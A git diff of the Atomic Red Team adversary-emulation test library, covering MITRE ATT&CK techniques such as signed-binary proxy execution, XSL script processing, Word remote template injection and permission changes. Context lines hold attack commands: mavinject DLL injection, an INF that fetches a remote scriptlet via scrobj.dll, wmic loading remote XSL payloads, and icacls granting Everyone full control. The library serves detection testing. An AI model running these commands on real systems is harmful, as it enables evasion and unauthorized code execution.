@@ -300,10 +328,14 @@ Executes the LaunchApplication function in pcwutl.dll to proxy execution of an e
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9f5d081a-ee5a-42f9-a04e-b7bdc487e676
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_to_launch | Path of the executable to launch | path | %windir%&#92;System32&#92;notepad.exe|
 
diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md
index 5e7cdbfd..49ffa97d 100644
--- a/atomics/T1218/T1218.md
+++ b/atomics/T1218/T1218.md
@@ -29,10 +29,14 @@ Injects arbitrary DLL into running process specified by process ID. Requires Win
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c426dacf-575d-4937-8611-a148a86a5e61
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process_id | PID of process receiving injection | string | 1000|
 | dll_payload | DLL to inject | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;x64&#92;T1218.dll|
@@ -52,7 +56,7 @@ mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}
 ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -72,10 +76,14 @@ Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d590097e-d402-44e2-ad72-2c6aa1ce78b1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | powershell_code | PowerShell code to execute | string | Start-Process calc.exe|
 
@@ -101,10 +109,14 @@ Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ad2c17ed-f626-4061-b21e-b9804a6f3655
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;Win32&#92;T1218-2.dll|
 
@@ -123,7 +135,7 @@ C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload}
 ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -145,10 +157,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/I
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1218&#92;src&#92;Infdefaultinstall.inf|
 
@@ -167,7 +183,7 @@ InfDefaultInstall.exe #{inf_to_execute}
 ##### Description: INF file must exist on disk at specified location (#{inf_to_execute})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -187,10 +203,14 @@ Emulates attack via documents through protocol handler in Microsoft Office.  On
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** db020456-125b-4c8b-a4a7-487df8afb5a2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx|
 
@@ -210,7 +230,7 @@ call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}"
 ##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} 
+if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -229,10 +249,14 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7cbb0f26-a4c1-4f77-b180-a009aa05637e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xml_payload | XML to execution | path | PathToAtomicsFolder&#92;T1218&#92;src&#92;T1218.xml|
 | mwcpath | Default location of Microsoft.Workflow.Compiler.exe | Path | C:&#92;Windows&#92;Microsoft.NET&#92;Framework64&#92;v4.0.30319|
@@ -253,7 +277,7 @@ Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly tha
 ##### Description: .Net must be installed for this test to work correctly.
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} 
+if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -272,10 +296,14 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4cc40fd7-87b8-4b16-b2d7-57534b86b911
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xml_payload | XML to execution | path | PathToAtomicsFolder&#92;T1218&#92;src&#92;T1218.xml|
 | renamed_binary | renamed Microsoft.Workflow.Compiler | path | PathToAtomicsFolder&#92;T1218&#92;src&#92;svchost.exe|
@@ -298,7 +326,7 @@ Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net as
 ##### Check Prereq Commands:
 ```powershell
 Copy-Item #{mwcpath}\#{mwcname} "#{renamed_binary}" -Force
-if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} 
+if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -325,10 +353,14 @@ Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9ebe7901-7edf-45c0-b5c7-8366300919db
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | module_name | Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified. | string | foo|
 | module_path | Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%&#92;Documents&#92;WindowsPowerShell&#92;Modules. | string | $PWD|
@@ -350,7 +382,7 @@ Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218/src/Infdefaultinstall.inf b/atomics/T1218/src/Infdefaultinstall.inf
index 57d45ecf..49ee5872 100644
--- a/atomics/T1218/src/Infdefaultinstall.inf
+++ b/atomics/T1218/src/Infdefaultinstall.inf
@@ -5,4 +5,4 @@ Signature=$CHICAGO$
 UnregisterDlls = Squiblydoo
 
 [Squiblydoo]
-11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct
+11,,scrobj.dll,2,60,https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index e569b4f2..58c028d8 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -23,6 +23,10 @@ An adversary may attempt to trick the user into downloading teamviewer and using
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0
+
+
+
 
 
 
@@ -57,6 +61,10 @@ An adversary may attempt to trick the user into downloading AnyDesk and use to e
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330
+
+
+
 
 
 
@@ -88,6 +96,10 @@ An adversary may attempt to trick the user into downloading LogMeIn and use to e
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d03683ec-aae0-42f9-9b4c-534780e0f8e1
+
+
+
 
 
 
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index b38e74bc..c88966ce 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -36,10 +36,14 @@ Executes the code specified within a XSL script tag during XSL transformation us
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ca23bfb2-023f-49c5-8802-e66997de462d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xmlfile | Location of the test XML file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1220&#92;src&#92;msxslxmlfile.xml|
 | xslfile | Location of the test XSL script file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1220&#92;src&#92;msxslscript.xsl|
@@ -59,7 +63,7 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
 ##### Description: XML file must exist on disk at specified location (#{xmlfile})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{xmlfile}) {exit 0} else {exit 1} 
+if (Test-Path #{xmlfile}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -69,7 +73,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 ##### Description: XSL file must exist on disk at specified location (#{xslfile})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{xslfile}) {exit 0} else {exit 1} 
+if (Test-Path #{xslfile}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -89,10 +93,14 @@ Executes the code specified within a XSL script tag during XSL transformation us
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml|
 | xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl|
@@ -119,10 +127,14 @@ Executes the code specified within a XSL script using a local payload.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1b237334-3e21-4a0c-8178-b8c996124988
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | wmic_command | WMI command to execute using wmic.exe | string | process list|
 | local_xsl_file | Location of the test XSL script file on the local filesystem. | path | PathToAtomicsFolder&#92;T1220&#92;src&#92;wmicscript.xsl|
@@ -142,7 +154,7 @@ wmic #{wmic_command} /FORMAT:"#{local_xsl_file}"
 ##### Description: XSL file must exist on disk at specified location (#{local_xsl_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} 
+if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -162,10 +174,14 @@ Executes the code specified within a XSL script using a remote payload. Open Cal
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7f5be499-33be-4129-a560-66021f379b9b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_xsl_file | Remote location of an XSL payload. | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl|
 | wmic_command | WMI command to execute using wmic.exe | string | process list|
diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md
index fbad78bd..d39205df 100644
--- a/atomics/T1221/T1221.md
+++ b/atomics/T1221/T1221.md
@@ -16,25 +16,31 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
 <br/>
 
 ## Atomic Test #1 - WINWORD Remote Template Injection
-Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens Calculator.exe when test sucessfully executed, while AV turned off.
+Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm 
+Executes the code specified within the .dotm template.
+Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  
+Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1489e08a-82c7-44ee-b769-51b72d03521d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| docx file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1221&#92;src&#92;Calculator.docx|
-| dotm template | Location of the test dotm template on the remote server. | Path | https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm|
+| docx_file | Location of the test docx file on the local filesystem. | Path | PathToAtomicsFolder&#92;T1221&#92;src&#92;Calculator.docx|
 
 
 #### Attack Commands: Run with `command_prompt`! 
 
 
 ```cmd
-start PathToAtomicsFolder\T1221\src\Calculator.docx
+start #{docx_file}
 ```
 
 
@@ -44,7 +50,7 @@ start PathToAtomicsFolder\T1221\src\Calculator.docx
 ##### Description: 
 ##### Check Prereq Commands:
 ```powershell
- 
+
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1221/T1221.yaml b/atomics/T1221/T1221.yaml
index 631277c1..3c554c5f 100644
--- a/atomics/T1221/T1221.yaml
+++ b/atomics/T1221/T1221.yaml
@@ -4,18 +4,17 @@ atomic_tests:
 - name: WINWORD Remote Template Injection
   auto_generated_guid: 1489e08a-82c7-44ee-b769-51b72d03521d
   description: |
-    Open a .docx file that loads a remote .dotm macro enabled template. Executes the code specified within the .dotm template.Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  Opens Calculator.exe when test sucessfully executed, while AV turned off.
+    Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm 
+    Executes the code specified within the .dotm template.
+    Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.  
+    Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
   supported_platforms:
   - windows
   input_arguments:
-    docx file:
+    docx_file:
       description: Location of the test docx file on the local filesystem.
       type: Path
       default: PathToAtomicsFolder\T1221\src\Calculator.docx
-    dotm template:
-      description: Location of the test dotm template on the remote server.
-      type: Path
-      default: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -23,5 +22,5 @@ atomic_tests:
     get_prereq_command: |
   executor:
     command: |
-      start PathToAtomicsFolder\T1221\src\Calculator.docx
+      start #{docx_file}
     name: command_prompt
diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md
index def6c2c7..bbef7697 100644
--- a/atomics/T1222.001/T1222.001.md
+++ b/atomics/T1222.001/T1222.001.md
@@ -28,10 +28,14 @@ be displayed for the folder and each file inside of it.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 98d34bb4-6e75-42ad-9c41-1dae7dc6a001
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_folder_to_own | Path of the file or folder for takeown to take ownership. | path | %temp%&#92;T1222.001_takeown_folder|
 
@@ -50,7 +54,7 @@ takeown.exe /f #{file_folder_to_own} /r
 ##### Description: Test requrires a file to take ownership of to be located at (#{file_folder_to_own})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -73,10 +77,14 @@ will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a8206bcc-f282-40a9-a389-05d9c0263485
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_or_folder | Path of the file or folder to change permissions. | path | %temp%&#92;T1222.001_cacls|
 | user_or_group | User or group to allow full control | string | Everyone|
@@ -96,7 +104,7 @@ icacls.exe #{file_or_folder} /grant #{user_or_group}:F
 ##### Description: Test requrires a file to modify to be located at (#{file_or_folder})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -118,10 +126,14 @@ Open the file in File Explorer > Right Click - Prperties and observe that the Re
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bec1e95c-83aa-492e-ab77-60c71bbd21b0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_or_folder | Path of the file or folder remove attribute. | path | %temp%&#92;T1222.001_attrib|
 
@@ -140,7 +152,7 @@ attrib.exe -r #{file_or_folder}\*.* /s
 ##### Description: Test requrires a file to modify to be located at (#{file_or_folder})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -164,10 +176,14 @@ the victim does not see the file.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 32b979da-7b68-42c9-9a99-0e39900fc36c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_or_folder | Path of the file or folder remove attribute. | path | %temp%&#92;T1222.001_attrib_2|
 
@@ -194,7 +210,7 @@ rmdir #{file_or_folder}
 ##### Description: Test requires a file to modify to be located at (#{file_or_folder})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -218,10 +234,14 @@ You can set your own path variable to "C:\*" if you prefer.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path | Path of folder to recursively set permissions on | path | C:&#92;Users&#92;Public&#92;*|
 | file_path | Path of folder permission back | Path | %temp%&#92;T1222.001-folder-perms-backup.txt|
@@ -245,7 +265,7 @@ icacls '#{path}' /restore #{file_path} /q >nul 2>&1
 ##### Description: Backup of original folder permissions should exist (for use in cleanup commands)
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
diff --git a/atomics/T1222.002/T1222.002.md b/atomics/T1222.002/T1222.002.md
index 607a4344..7d70fc6e 100644
--- a/atomics/T1222.002/T1222.002.md
+++ b/atomics/T1222.002/T1222.002.md
@@ -35,10 +35,14 @@ Changes a file or folder's permissions using chmod and a specified numeric mode.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 34ca1464-de9d-40c6-8c77-690adf36a135
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | numeric_mode | Specified numeric mode value | string | 755|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -65,10 +69,14 @@ Changes a file or folder's permissions using chmod and a specified symbolic mode
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** fc9d6695-d022-4a80-91b1-381f5c35aff3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | symbolic_mode | Specified symbolic mode value | string | a+w|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -95,10 +103,14 @@ Changes a file or folder's permissions recursively using chmod and a specified n
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** ea79f937-4a4d-4348-ace6-9916aec453a4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | numeric_mode | Specified numeric mode value | string | 755|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -125,10 +137,14 @@ Changes a file or folder's permissions recursively using chmod and a specified s
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 0451125c-b5f6-488f-993b-5a32b09f7d8f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | symbolic_mode | Specified symbolic mode value | string | a+w|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -155,10 +171,14 @@ Changes a file or folder's ownership and group information using chown.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** d169e71b-85f9-44ec-8343-27093ff3dfc0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | owner | Username of desired owner | string | root|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml|
@@ -186,10 +206,14 @@ Changes a file or folder's ownership and group information recursively using cho
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** b78598be-ff39-448f-a463-adbf2a5b7848
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | owner | Username of desired owner | string | root|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -217,10 +241,14 @@ Changes a file or folder's ownership only using chown.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 967ba79d-f184-4e0e-8d09-6362b3162e99
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | owner | Username of desired owner | string | root|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml|
@@ -247,10 +275,14 @@ Changes a file or folder's ownership only recursively using chown.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | owner | Username of desired owner | string | root|
 | file_or_folder | Path of the file or folder | path | /tmp/AtomicRedTeam/atomics/T1222.002|
@@ -278,10 +310,14 @@ This technique was used by the threat actor Rocke during the compromise of Linux
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** e7469fe2-ad41-4382-8965-99b94dd3c13f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_modify | Path of the file | path | /var/spool/cron/root|
 
diff --git a/atomics/T1482/T1482.md b/atomics/T1482/T1482.md
index f5d5b0ab..9eac5248 100644
--- a/atomics/T1482/T1482.md
+++ b/atomics/T1482/T1482.md
@@ -24,6 +24,10 @@ Requires the installation of dsquery via Windows RSAT or the Windows Server AD D
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4700a710-c821-4e17-a3ec-9e4c81d6845f
+
+
+
 
 
 
@@ -50,6 +54,10 @@ This technique has been used by the Trickbot malware family.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2e22641d-0498-48d2-b9ff-c71e496ccdbe
+
+
+
 
 
 
@@ -67,7 +75,7 @@ nltest /domain_trusts
 ##### Description: nltest.exe from RSAT must be present on disk
 ##### Check Prereq Commands:
 ```cmd
-WHERE nltest.exe >NUL 2>&1 
+WHERE nltest.exe >NUL 2>&1
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -87,6 +95,10 @@ Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c58fbc62-8a62-489e-8f2d-3565d7d96f30
+
+
+
 
 
 
@@ -108,7 +120,7 @@ Get-ADGroupMember Administrators -Recursive
 ##### Description: PowerView PowerShell script must exist on disk
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1} 
+if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -117,7 +129,7 @@ Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit
 ##### Description: RSAT PowerShell AD admin cmdlets must be installed
 ##### Check Prereq Commands:
 ```powershell
-if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 } 
+if ((Get-Command "Get-ADDomain" -ErrorAction Ignore) -And (Get-Command "Get-ADGroupMember" -ErrorAction Ignore)) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -137,10 +149,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -159,7 +175,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -179,10 +195,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 15fe436d-e771-4ff3-b655-2dca9ba52834
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -201,7 +221,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 82bfd6ff..cdb01b5b 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -24,10 +24,14 @@ the powershell session along with other information about the file that was dele
 **Supported Platforms:** Windows
 
 
